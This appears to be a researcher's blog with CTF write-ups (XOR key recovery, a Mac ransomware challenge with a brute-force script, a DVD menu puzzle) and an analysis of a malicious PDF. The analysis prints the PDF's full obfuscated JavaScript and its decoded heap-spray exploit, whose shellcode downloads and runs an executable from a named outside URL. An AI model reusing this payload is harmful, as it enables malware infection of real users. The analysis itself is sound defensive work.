Awesome, data is in place, now let's get back to our math. It's a somewhat straightforward routine, just hindered by the language and the difficulty of getting dynamic analysis to work. It also has a great weakness that can be exploited. For each byte, it takes the respective byte of the pad, performs this routine, which ends in an XOR, and then compares the result to a check value. That check value never changes, so we can exploit XOR.



As many know, XOR works in deltas. A ^ B == C. A ^ C == B. C ^ B == A. If you know any two values you can determine the third. And so you can use this to your advantage. In here we know the respective "pad" value, and the check byte. Regardless of what math occurs up until the end, we can solve for the correct byte at the very last operation by XOR'ing the pad byte against the check byte.

And so, by tracing along the code, I found that at the end it XORs the router.lck byte against the respective pad byte and compares the result to the respective check byte. So, for each byte, just XOR the pad byte with the check byte and you'll get the original data. Then patch the compared register so the check passes and execution loops around to the next byte. So, set a breakpoint at that part, step to the comparison operation, and display registers v0 and v1.

Specifically, break at 0x400c5c, step (stepi), and display v1 (i r v1) to get the pad byte. Set a breakpoint at 0x400c78 and step forward to display the data byte (a0), pad byte (v0), and check byte (v1). XOR v0 with v1 in a calculator to get the original data byte. Then set v0 to v1 so that it passes the check, and continue (c) forward.
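The calculator step is just the XOR identity applied once per byte. A minimal sketch, with invented pad values standing in for the ones built in the binary and only four bytes shown:

```python
def recover_byte(pad_byte, check_byte):
    # If data ^ pad == check, then data == pad ^ check.
    return pad_byte ^ check_byte


# Hypothetical pad values; the real ones are constructed inside the binary.
pad = [0x13, 0x37, 0xC0, 0xDE]
secret = b"that"

# What the program would compare against for each position.
check = [p ^ c for p, c in zip(pad, secret)]

# Knowing only pad and check is enough to get the data back.
recovered = bytes(recover_byte(p, c) for p, c in zip(pad, check))
print(recovered)
```

In the debugger session, `pad` and `check` are the values read from the registers at the comparison, one pair per loop iteration.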


Once all was determined, and I was able to step through and determine the first few bytes of the data, I decided to just go and do them all. It was only 29 of them.  When all was done, I had my key. Actually, I was able to stop early and guess the end part, with the whole thing being:

that_ransomware_ran_somewhere

This was a fun challenge that I learned a lot from.

Binary 4 - Mac Ransomware


This challenge was fairly straightforward, but did have a few notable and funny components to discuss. Once downloaded, the challenge contained a 64-bit Mach-O executable and a binary file named PANW_Top_Secret_Sauce.jpg.encrypted.

The binary acquires the MAC address of the system and uses it as a key to RC4 encrypt a file named PANW_Top_Secret_Sauce.jpg. A unique computer identifier is also generated to send to the "ransomware" developers.

I executed this challenge using Hopper, a tool I don't recommend, but was chosen out of laziness. This challenge could also be performed using the IDA Pro debugger with the Mac remote debugger, which is a preferable method.

One unusual issue is that the sample attempts to detect if it is running within a VM by running a standard ioreg command:

ioreg -l | grep -e Manufacturer -e 'Vendor Name' | grep -e 'Parallels' -e VMware -e Fusion -e 'Virtual Box'

This command displays any I/O registry lines for 'Manufacturer' or 'Vendor Name' that contain 'Parallels', 'VMware', 'Fusion', or 'Virtual Box'. However, there appears to be a bug in the way the challenge was developed. If executed by a typical user in a VM, it _should_ catch this and fail. However, if executed under another application, like Hopper, there is no PATH set to find ioreg. The execution will 'fail open' and the program will proceed regardless of being in a VM or not.



For this check to work reliably, the command must be given by its absolute path, /usr/sbin/ioreg. Once that's done, it executes correctly and returns back the value to say it's running in a VM:



After this basic check, the MAC address of the system is used to perform the encryption using RC4. This is done through a standard, easily recognizable RC4 algorithm implemented statically. This same MAC address is then used to generate a unique identifier through an algorithm below:


This routine takes the values of a static lookup table, below, and generates a 5-byte output based upon the first five bytes of the MAC address.


Now, how do we attack this? We can't go backwards from the resulting file, so we'll have to brute force various MAC addresses until we find the correct one.
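Testing one candidate MAC against the encrypted file could look like the sketch below: RC4-decrypt the first few bytes and check for the JPEG magic. It assumes the key is the raw six MAC bytes, which the analysis above does not spell out, and the helper names and demo values are mine.

```python
def rc4(key, data):
    # Key-scheduling algorithm (KSA).
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    # Pseudo-random generation algorithm (PRGA), XORed over the data.
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


JPEG_MAGIC = b"\xff\xd8\xff"


def looks_like_jpeg(mac, encrypted_head):
    # Only the first bytes are needed, so each guess stays cheap.
    return rc4(mac, encrypted_head).startswith(JPEG_MAGIC)


# Hypothetical demo: encrypt a fake JPEG header, then test candidate MACs.
mac = bytes.fromhex("0123456789ab")
head = rc4(mac, JPEG_MAGIC + b"\xe0\x00\x10JFIF")
print(looks_like_jpeg(mac, head))
print(looks_like_jpeg(bytes.fromhex("0123456789ac"), head))
```

Because RC4 is a stream cipher, only the header has to be decrypted per guess, but that does nothing about the size of the key space.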

Brute forcing based upon a 6-byte value would take an extremely long time. With only the first five in play, I assumed this would be an obvious tell to help lower the key space due to this length. So, I launched a brute force script and, after 12 hours, barely made a dent into the keyspace. Ouch. This wasn't going to work.

I stopped for awhile and went onto other challenges, but came back after poking around the World Map and finally realized the hint:


Hint: Send me this identifier together with your $$$$ to decrypt your file: da91e949f4c2e814f811fbadb3c195b8

Whoa. That's the identifier. I don't need to brute force the JPG, I just need to brute force the ID routine to find a value that matches that hash. I turned my brute forcer to that, came back 12 hours later, and realized I still wasn't getting enough performance to finish this quickly.

I thought of ways to shorten this and realized I could just download a master database of all MAC address Organizationally Unique Identifiers (OUIs). It's still a hefty list of tens of thousands, so I removed the virtual machine ones to shrink the keyspace, since we know the sample won't run in those environments:



import hashlib

lookup = b'\x13\x9A\x1B\xE4\xF3\x8E\xC7\x8C\x3F\x7A\xDC\x0B\x42\xA7\xF8\x6E\x9F\x08\x79\x17\xD6\xB1\x33\x7D\x67\x01\x1C\x1C\x1C\x02\x30\x0A\x34\x34\x22\x1B\x34\x03\x0C\x02\x14\x02\x01\xC0\x01\x01\x21\x02\x01\xC8\x22\x01'
TARGET = 'da91e949f4c2e814f811fbadb3c195b8'


def run_data(mac):
    # Rebuild the 5-value identifier from the first five MAC bytes, then MD5 it
    result = [0, 0, 0, 0, 0]
    done = b''
    for i in range(5):
        for j in range(5):
            pos = (20 * j + 4 * i) // 4
            result[i] += lookup[pos] * mac[j]

        result[i] = result[i] % 0xFB
        # Each value is stored as a 32-bit little-endian integer
        done += bytes([result[i]]) + b'\x00\x00\x00'

    return hashlib.md5(done).hexdigest()


def main():
    with open('oui.txt', 'r') as oui_file:
        for line in oui_file:
            # Only the "(hex)" lines carry an OUI such as 00-1C-42
            if '(hex)' not in line:
                continue
            oui_addr = bytes.fromhex(line.split()[0].strip().replace('-', ''))
            print('[*] OUI: {}0000'.format(oui_addr.hex()))
            for a in range(256):
                for b in range(256):
                    test = oui_addr + bytes([a, b])
                    result = run_data(test)
                    if result == TARGET:
                        print(result)
                        print(test, test.hex())
                        quit()
            print('-- {}'.format(test.hex()))


if __name__ == '__main__':
    main()


However, after hours of running, I still got nothing. In fact, it ran through everything with no positive results. Frustrated, I went back to my large-scale brute force which was estimated to take days. I wrote off hate mail to the organizers and went back to other challenges.

It bugged me, though. So, I started throwing everything at it. I then found the answer accidentally. I ran the brute force checker against the master database of OUIs instead of my filtered list, and the answer eventually popped up:


That snap was a vessel in my forehead. I thought I was missing something obvious, but there it is. The correct MAC address was one from a Parallels environment, even though it appeared the program was ruling out Parallels as a viable environment. I think? Now I'm doubting myself. Whatever, that was the correct MAC segment (00-1c-42-92-df-??). I used that to decrypt the JPG and received my answer:


Oh, but our story didn't end there. Mac OS X is my preferred environment, especially for this type of work. And my MacBook is actually a company-owned asset, as is normal for all of us. However, it's also a company-managed asset and my company is Carbon Black, who makes endpoint protection products. When I saw the VM checking, and had verified the code wasn't malicious, I ran it on my host instead of in a VM. So, it shouldn't have been a surprise when, during analysis, our Security Operations team knocked on my virtual door to see what I was doing.

Threat hunting had found a binary running on my system, encrypting files. Well, technically just one file, but it looked suspicious.


OK. No problem, can explain that away. But the binary has a 17/56 score on VirusTotal...


Yeah, that's a bit harder. To its credit, most AV engines have it marked up as "RansomLabyrenth", so it's kind of evident where it came from. If you know what LabyREnth is... But kudos to the blue team for detecting me. If I had only known that the challenge would've run properly in the VM with Hopper.


Random #3 Dogs


The Random track had some of my favorite challenges in this year's LabyREnth. They also took the 'random' to heart with challenges that all came from left field. Many times it was the same style of data decoding but in an unusual format, but the one that I loved was the Dogs challenge (Random #3). If you're reading this for an insightful post on how to solve it, I'll just go ahead and disappoint you. You're not going to get it.

Dogs was found by discovering and following a blind hallway in the World Map. At the end you find yourself alongside a cute little puppy. By 'pet'ting the dog you get the challenge:

The puppy purrs because he thinks he's a cat. You realize he's communicating with you telepathically, and sending you information about a challenge!
Hint: DoGz-CeNtRaL presents a fine new release:[DoGz-CeNtRaL] DOGS.THE.MOVIE.2017.DVDRIP.iso. The menus can be a little tricky.
Author: @gabe_k




Sure enough, you're presented with a DVD ISO with a menu system showing dogs. Lots of dogs. Dogstravaganza. If you click the wrong dog, you see a dog falling in the water. If you select the right dog, he balances an egg on his nose.



Looking into the structure of the DVD you'll see the standard DVD files as well as a Flag.mp4. Playing Flag.mp4 showed nothing but a few seconds of black, so I used VLC to separate each frame into a PNG. The result was 121 PNGs of frames, but only of two unique types. Frames 1-13 were all hash duplicates of each other, and 14-121 were all hash duplicates of each other. At only ~1-2 KB each, there was nothing that seemed of consequence, so I ignored it.

Analysis of the VIDEO_TS.BUP shows it was developed with DVDAuthor 0.7.1. So, after an hour of unsuccessfully trying to install it on my Mac, I spun up an old Linux VM and used the newly installed dvdauthor application to unpack the DVD.
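Spotting duplicate frames by hash is easy to script. A minimal sketch, assuming the extracted PNGs sit in one folder; the function name and the choice of SHA-256 are mine, not something from the original analysis:

```python
import hashlib
from collections import defaultdict
from pathlib import Path


def group_by_hash(folder, pattern="*.png"):
    # Map each content hash to the sorted list of file names that share it.
    groups = defaultdict(list)
    for path in sorted(Path(folder).glob(pattern)):
        digest = hashlib.sha256(path.read_bytes()).hexdigest()
        groups[digest].append(path.name)
    return dict(groups)
```

Calling `group_by_hash("frames")` on a folder of extracted frames returns one entry per unique image, so two entries would match the two frame types seen here.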




The results were a single XML script file and a series of 29 MPEG VOBs (vob_00m_001 - 029.vob). vob_01t_001.vob is the video of the dog falling in water and vob_01t_002.vob is the video of the dog balancing an egg. The next step seems straightforward: just get the correct letter from each video frame. Not easily done. After extracting out each frame, you can vaguely see an impression of each letter as well as some unknown blocks that seem to correlate to the menu buttons:


See it? How's this... (MSPaint is deprecated, not removed)


But, the order of frames doesn't add up. "P" isn't first, and the frames just seem to be in alphabetical order. The 29 frames account for the 26 A-Z letters plus "_{}". Pulling the results from dvdauthor.xml shows the DVD menu's scripting system, something completely new to me. A segment below (portions removed for brevity):



<menus lang="en">
  <video/>
  <audio lang="en" format="ac3"/>
  <subpicture lang="en"/>
  <!-- Menu 1/29 -->
  <pgc>
    <audio id="0"/>
    <subpicture id="0"/>
    <pre>
      g13=g1;
      g13=g13 and 4095;
      if (g13 != 101) {
        goto l7;
      }
      if (g0 le 0) {
        goto l7;
      }
      button=g0;
      goto l8;
      l7:
      button=1k; <!-- button no 1 -->
      l8:
      g1=101;
    </pre>
    <vob file="vob_00m_001.vob">
      <buttons start="0:00:00.000">
        <button name="1">
          g15=1;
          jump pgc tail;
        </button>
        <button name="2">
          g15=2;
          jump pgc tail;
        </button>
        <button name="3">
          g15=3;
          jump pgc tail;
        </button>
        <button name="4">
          g15=4;
          jump pgc tail;
        </button>
        <button name="5">
          g15=5;
          jump pgc tail;
        </button>
        <button name="6">
          g15=6;
          jump pgc tail;
        </button>
      </buttons>
      <cell start="0:00:00.000" program="1" pause="inf"/>
    </vob>
    <post>
      g14=g15;
      g15=0;
      if (g14 == 1) {
        goto l29;
      }
      if (g14 == 2) {
        goto l31;
      }
      if (g14 == 3) {
        goto l33;
      }
      if (g14 == 4) {
        goto l35;
      }
      if (g14 == 5) {
        goto l37;
      }
      if (g14 == 6) {
        goto l39;
      }
      if (g6 != 6) {
        goto l12;
      }
      if (g14 == 7) {
        g6=7;
      }
      if (g14 == 7) {
        goto l41;
      }
      l12:
      if (g14 == 7) {
        goto l39;
      }
      if (g14 == 8) {
        goto l43;
      }
      if (g14 == 9) {
        goto l45;
      }
      if (g14 == 10) {
        goto l47;
      }
      if (g14 == 11) {
        goto l49;
      }
      if (g14 == 12) {
        goto l51;
      }
      if (g6 != 1) {
        goto l21;
      }
      if (g14 == 13) {
        g6=2;
      }
      if (g14 == 13) {
        goto l53;
      }
      l21:
      if (g14 == 13) {
        goto l30;
      }
      if (g14 == 14) {
        goto l55;
      }
      if (g14 == 15) {
        goto l57;
      }
      if (g14 == 16) {
        goto l59;
      }
      if (g14 == 17) {
        goto l61;
      }
      if (g14 == 18) {
        goto l63;
      }
      if (g14 == 19) {
        goto l65;
      }
      exit;
      l29:
      g0=button;
      l30:
      jump title 1;
      l39:
      g0=button;
      jump title 1;
      l41:
      g0=button;
      jump title 10;
      l43:
      g0=button;
      jump title 1;
      l53:
      g0=button;
      jump title 15;
    </post>
  </pgc>

Wow! OK, so there are 19 buttons. Each button can use jumps to change to new titles, but can also do post-scripting to move values while also checking its current state.

This one was actually easily solved. Because, I'm going to disappoint. I started poking at this while in Montreal for REcon. I then finished while being stranded in the Montreal airport for a day and a half due to massive storms in the US Northeast. So, I sat at a US-Southern-BBQ place in a Canadian airport, eating BBQ Rib Poutine and cheap beer, and just clicked them all. I broke the menu into quadrants to map out the buttons on paper. I then just clicked them all. Once I found one that worked, I took a VM snapshot. If I failed, I just reverted back.




It took roughly 1-2 minutes per letter and within an hour of drinking I had the answer:

PAN{RIP_AIR_BUD}



But I definitely want to read some write-ups on this one. The DVD language looks really cool, and I have an idea behind how to do it.


That's it. Some of the more interesting challenges that I liked. And I'm looking forward to 2018's LabyREnth!

Malicious PDF Analysis: Reverse code obfuscation

I normally don't find the time to analyze malware at home, unless it is somehow targeted towards me (like the prior write-up of an infection on this site). This last week I received a very suspicious PDF in an email that made it through Gmail's spam filters and grabbed my attention.

The email was delivered to my Google Mail account and appeared in my inbox. It was easily accessible at first, but within two days Google alerted on the virus in the attachment and prevented downloading it. The email had one attachment, 92247.pdf, which could still be obtained as Base64 when viewing the email in its raw form.

A quick view in a hex editor showed that the file, only 13,205 bytes in size, included no obvious dropper, decoy, or even displayable PDF data. There was just one object of note, which contained an XML subform with embedded JavaScript. Boring...

Upon examining the JavaScript, I saw a large block of data that would normally contain the shellcode, or even further JavaScript, to attack the victimized system. However, this example proved odd. There was a large block of such data (abbreviated below), but it contained only integers between 0 and 74. This is not standard shellcode.

    arr='0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@12@11@3@5@5@5@11@9';

So I started looking at the surrounding code:



    8 0 obj <</Length 325325>> stream <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
    <asd/>as<config xmlns='123'><asd/>
    <xdp:present>
    <pdf>
    <xdp:interactive>1</xdp:interactive>
    <int>0</int>
    a
    <asd/>a<version>1.5</version>
    a<asd/>
    </pdf>
    </xdp:present>
    <asd/></config><asd/>
    <template xmlns='http://www.xfa.org/schema/xfa-template/2.5/'>
    <asd/>
    a<subform name="a1"> <pageSet>
    <pageArea id="roteYom" name="roteYom">
    <contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/>
    <medium long="792pt" short="612pt" stock="default"/>
    </pageArea>
    </pageSet>
    <asd/>a
    <subform name='v236536b346b'>
    a<asd/>a<field name='qwe123b'>a<asd/>a<event activity='initialize'>
    <script contentTyp='application'
    contentType='application/x-javascript'>
    x='e';
    arr='0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@12@11@3@5@5@5@11@9';
    cc={q:"var pding;b,cefhots_x=wAy()l1\"420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"}.q;

    q=x+'v'+'al';
    a=(Date+String).substr(2,3);
    aa=([].unshift+[].reverse).substr(2,3);
    if (aa==a){
    t='3vtwe';
    e=t['substr'];
    w=e(12)[q];
    s=[];
    ar=arr.split('@');
    n=cc;
    for(i=0;i<ar.length;i++){
    s[i]=n[ar[i]];
    }
    if(a===aa)w(s.join(''));
    }
    </script>a
    </event><ui>
    <imageEdit/>
    </ui>
    </field>
    </subform>
    </subform><Gsdg/>a</template>a<asd/>a<xfa:datasets a='a' xmlns:xfa='http://www.xfa.org/schema/xfa-data/1.1' b='b'>
    <xfa:data><a1 test="123">
    </a1>
    </xfa:data>
    </xfa:datasets>
    </xdp:xdp>
    endstream
    endobj
The first few things that popped out were obfuscated / escaped variable names. You can see a reference to "n" but nowhere where it is initialized. Instead, you see variables named "&#000119;" and "&#000110;". These are HTML character references carrying the ASCII decimal values for "w" and "n" respectively. Additionally, operators like "<" are escaped as the HTML entity "&lt;". The big thing we look for is the "eval()" statement, and it is equally obfuscated as: x='e'; q=x + 'v'+'al';, making q = "eval".

But, what about that large block of data? And what is up with that unusual "cc" variable that contains a large list of characters? By analyzing the decoding "for" loop, you can see the meaning. The "cc" is actually the custom character set of the end result, and the large data block "arr" is a series of numbers that each reference an individual character, separated by "@".

With this configuration, you can visually analyze the first few pointers:
0@1@2@3@4@1@5@5@6@7@8@9 equals "var padding;". Bingo. But, even with this layer of obfuscation, a quick Python script makes short work of it:
    # Index list (abbreviated here); each number is an offset into cc
    arr='0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@11@3@5@5@28@30@28@28@9'
    # Custom character set copied from the PDF's JavaScript
    cc="var pding;b,cefhots_x=wAy()l1\"420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"
    # Look up each index in cc and join the characters back together
    result="".join(cc[int(i)] for i in arr.split("@"))
    print(result)
When run, voila! Our deobfuscated code:
    var padding;var bbb, ccc, ddd, eee, fff, ggg, hhh;var pointers_a, i;var x = new
    Array();var y = new Array();var _l1="4c20600f0517804a3c20600f0f63804aa3eb804a302
    0824a6e2f804a41414141260000000000000000000000000000001239804a6420600f00040000414
    14141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0
    374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f
    5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e240
    3dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf
    38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1
    083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5
    c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c
    7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00f
    f561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c
    46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f706874747
    03a2f2f757262616e2d676561722e636f6d2f3430345f706167655f696d616765732f303230362e6
    578650000";var _l2="4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a4141
    4141260000000000000000000000000000007188804a6420600f0004000041414141414141416683
    e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ff
    ffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c9
    4941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ec
    ff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559
    e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
    00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc70424726567
    73c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7
    441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a00
    53ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e8
    9cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f757262616e
    2d676561722e636f6d2f3430345f706167655f696d616765732f303230362e6578650000";_l3=ap
    p;_l4=new Array();function _l5(){var _l6=_l3.viewerVersion.toString();_l6=_l6.re
    place('.','');while(_l6.length<4)_l6+='0';return parseInt(_l6,10)}function _l7(_
    l8,_l9){while(_l8.length*2<_l9)_l8+=_l8;return _l8.substring(0,_l9/2)}function _
    I0(_I1){_I1=unescape(_I1);roteDak=_I1.length*2;dakRote=unescape('%u9090');spray=
    _l7(dakRote,0x2000-roteDak);loxWhee=_I1+spray;loxWhee=_l7(loxWhee,524098);for(i=
    0; i < 400; i++)_l4[i]=loxWhee.substr(0,loxWhee.length-1)+dakRote;}function _I2(
    _I1,len){while(_I1.length<len)_I1+=_I1;return _I1.substring(0,len)}function _I3(
    _I1){ret='';for(i=0;i<_I1.length;i+=2){b=_I1.substr(i,2);c=parseInt(b,16);ret+=S
    tring.fromCharCode(c);}return ret}function _ji1(_I1,_I4){_I5='';for(_I6=0;_I6<_I
    1.length;_I6++){_l9=_I4.length;_I7=_I1.charCodeAt(_I6);_I8=_I4.charCodeAt(_I6%_l
    9);_I5+=String.fromCharCode(_I7^_I8);}return _I5}function _I9(_I6){_j0=_I6.toStr
    ing(16);_j1=_j0.length;_I5=(_j1%2)?'0'+_j0:_j0;return _I5}function _j2(_I1){_I5=
    '';for(_I6=0;_I6<_I1.length;_I6+=2){_I5+='%u';_I5+=_I9(_I1.charCodeAt(_I6+1));_I
    5+=_I9(_I1.charCodeAt(_I6))}return _I5}function _j3(){_j4=_l5();if(_j4<9000){_j5
    ='o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';_j6=_l1;_j7=
    _I3(_j6)}else{_j5='kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE
    4BK';_j6=_l2;_j7=_I3(_j6)}_j8='SUkqADggAABB';_j9=_I2('QUFB',10984);_ll0='QQcAAAE
    DAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwE
    EAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';_ll1=_j8+_j9+_ll0+_j5;_ll2=_ji1(_
    j7,'');if(_ll2.length%2)_ll2+=unescape('');_ll3=_j2(_ll2);with({k:_ll3})_I0(k
    );qwe123b.rawValue=_ll1}_j3();
With this type of output, I would typically use Malzilla to clean it up for exploit analysis. But, with the shellcode in plain sight, I'll go right for the payload. There are actually two copies of the shellcode, stored as "_l1" and "_l2", with a few slight differences between the two. The code is actually binary data stored as plaintext hex, where every two characters give the hexadecimal value of one byte. Copying and pasting the data into a hex editor can convert it to binary.
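
The copy-and-paste step can also be scripted. What follows is a minimal Python sketch, not the method used for this post: it converts plaintext hex into raw bytes and then lists the printable ASCII runs, much like a strings utility would. The helper names hex_to_bytes and ascii_strings are my own invention, and the sample is only the tail end of "_l1" as shown above, not the full payload.

```python
import re


def hex_to_bytes(hex_text: str) -> bytes:
    """Convert plaintext hex (two characters per byte) into raw bytes."""
    # Drop any whitespace or line breaks picked up while copying the string.
    return bytes.fromhex("".join(hex_text.split()))


def ascii_strings(data: bytes, min_len: int = 4) -> list:
    """Return every run of printable ASCII that is at least min_len bytes long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [run.decode("ascii") for run in re.findall(pattern, data)]


# Tail end of the "_l1" value from the decoded JavaScript (not the full payload).
L1_TAIL = (
    "8a5b1bc64679361a2f70687474703a2f2f757262616e2d676561722e636f6d2f"
    "3430345f706167655f696d616765732f303230362e6578650000"
)

if __name__ == "__main__":
    payload = hex_to_bytes(L1_TAIL)
    for text in ascii_strings(payload):
        print(text)
```

Writing the returned bytes to disk with open(path, "wb") would give the same file a hex editor produces from the pasted text.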

Now, normally you would look for shellcode obfuscation and API resolutions with IDA Pro or a debugger like Immunity/OllyDbg, but this one is pretty straightforward. It's a simple downloader with the URL in plain text (similar to a sample I demonstrated to TV's David McCallum... just saying ;)). When I view the data in my favorite free hex editor, HxD, I can see:
    Offset(h)00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

    00000000 4C 20 60 0F 05 17 80 4A 3C 20 60 0F 0F 63 80 4A L `...€J< `..c€J
    00000010 A3 EB 80 4A 30 20 82 4A 6E 2F 80 4A 41 41 41 41 £ë€J0 ‚Jn/€JAAAA
    00000020 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &...............
    00000030 12 39 80 4A 64 20 60 0F 00 04 00 00 41 41 41 41 .9€Jd `.....AAAA
    00000040 41 41 41 41 66 83 E4 FC FC 85 E4 75 34 E9 5F 33 AAAAfƒäüü…äu4é_3
    00000050 C0 64 8B 40 30 8B 40 0C 8B 70 1C 56 8B 76 08 33 Àd‹@0‹@.‹p.V‹v.3
    00000060 DB 66 8B 5E 3C 03 74 33 2C 81 EE 15 10 FF FF B8 Ûf‹^<.t3,.î..ÿÿ¸
    00000070 8B 40 30 C3 46 39 06 75 FB 87 34 24 85 E4 75 51 ‹@0ÃF9.uû‡4$…äuQ
    00000080 E9 EB 4C 51 56 8B 75 3C 8B 74 35 78 03 F5 56 8B éëLQV‹u<‹t5x.õV‹
    00000090 76 20 03 F5 33 C9 49 41 FC AD 03 C5 33 DB 0F BE v .õ3ÉIAü..Å3Û.¾
    000000A0 10 38 F2 74 08 C1 CB 0D 03 DA 40 EB F1 3B 1F 75 .8òt.ÁË..Ú@ëñ;.u
    000000B0 E6 5E 8B 5E 24 03 DD 66 8B 0C 4B 8D 46 EC FF 54 æ^‹^$.Ýf‹.K.FìÿT
    000000C0 24 0C 8B D8 03 DD 8B 04 8B 03 C5 AB 5E 59 C3 EB $.‹Ø.Ý‹.‹.Å«^YÃë
    000000D0 53 AD 8B 68 20 80 7D 0C 33 74 03 96 EB F3 8B 68 S.‹h €}.3t.–ëó‹h
    000000E0 08 8B F7 6A 05 59 E8 98 FF FF FF E2 F9 E8 00 00 .‹÷j.Yè˜ÿÿÿâùè..
    000000F0 00 00 58 50 6A 40 68 FF 00 00 00 50 83 C0 19 50 ..XPj@hÿ...PƒÀ.P
    00000100 55 8B EC 8B 5E 10 83 C3 05 FF E3 68 6F 6E 00 00 U‹ì‹^.ƒÃ.ÿãhon..
    00000110 68 75 72 6C 6D 54 FF 16 83 C4 08 8B E8 E8 61 FF hurlmTÿ.ƒÄ.‹èèaÿ
    00000120 FF FF EB 02 EB 72 81 EC 04 01 00 00 8D 5C 24 0C ÿÿë.ër.ì.....\$.
    00000130 C7 04 24 72 65 67 73 C7 44 24 04 76 72 33 32 C7 Ç.$regsÇD$.vr32Ç
    00000140 44 24 08 20 2D 73 20 53 68 F8 00 00 00 FF 56 0C D$. -s Shø...ÿV.
    00000150 8B E8 33 C9 51 C7 44 1D 00 77 70 62 74 C7 44 1D ‹è3ÉQÇD..wpbtÇD.
    00000160 05 2E 64 6C 6C C6 44 1D 09 00 59 8A C1 04 30 88 ..dllÆD...YŠÁ.0ˆ
    00000170 44 1D 04 41 51 6A 00 6A 00 53 57 6A 00 FF 56 14 D..AQj.j.SWj.ÿV.
    00000180 85 C0 75 16 6A 00 53 FF 56 04 6A 00 83 EB 0C 53 …Àu.j.SÿV.j.ƒë.S
    00000190 FF 56 04 83 C3 0C EB 02 EB 13 47 80 3F 00 75 FA ÿV.ƒÃ.ë.ë.G€?.uú
    000001A0 47 80 3F 00 75 C4 6A 00 6A FE FF 56 08 E8 9C FE G€?.uÄj.jþÿV.èœþ
    000001B0 FF FF 8E 4E 0E EC 98 FE 8A 0E 89 6F 01 BD 33 CA ÿÿŽN.ì˜þŠ.‰o.½3Ê
    000001C0 8A 5B 1B C6 46 79 36 1A 2F 70 68 74 74 70 3A 2F Š[.ÆFy6./phttp:/
    000001D0 2F 75 72 62 61 6E 2D 67 65 61 72 2E 63 6F 6D 2F /urban-gear.com/
    000001E0 34 30 34 5F 70 61 67 65 5F 69 6D 61 67 65 73 2F 404_page_images/
    000001F0 30 32 30 36 2E 65 78 65 00 00 0206.exe..
The URL is a dead giveaway. A well trained eye can see additional strings appear, typically as four bytes of op-code followed by four bytes of a string, like: codeDATAcodeDATAcodeDATA (Why? Because it takes 4 bytes of code to say "move this 4-bytes of data into a memory register at X location"). A visual analysis shows the command line: "regsvr32 -s wpbt.dll", as well as a DLL call "urlmon" (practice looking for those). So, from this, we can tell some of the functionality. We know that it at least downloads an executable file from a remote server to the local temporary path (API call to GetTempPathA) and runs it, and that it also potentially installs a DLL on the system. A view from within IDA Pro would tell more, but I think I've reached enough text with this posting.
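
The codeDATAcodeDATA pattern can be picked out programmatically as well. This is only a rough heuristic sketch in Python, with a function name (stacked_strings) that I made up: it looks for two common encodings of the x86 "mov dword [mem], imm32" instruction (opcode C7) and joins whatever printable four-byte immediates follow them. It will miss strings built with push instructions, such as "urlmon" here, and it can produce false positives on arbitrary data, so treat the output as a hint rather than a disassembly.

```python
import re

# C7 /0 is "mov r/m32, imm32". Two stack-style encodings are matched here:
#   C7 04 24 <imm32>               mov dword [esp], imm32
#   C7 44 <sib> <disp8> <imm32>    mov dword [base+index+disp8], imm32
# Only immediates made of four printable ASCII bytes are kept.
MOV_IMM32 = re.compile(rb"\xc7(?:\x04\x24|\x44..)([\x20-\x7e]{4})", re.DOTALL)


def stacked_strings(code: bytes) -> str:
    """Join the printable 4-byte immediates of matching mov instructions."""
    return b"".join(MOV_IMM32.findall(code)).decode("ascii")


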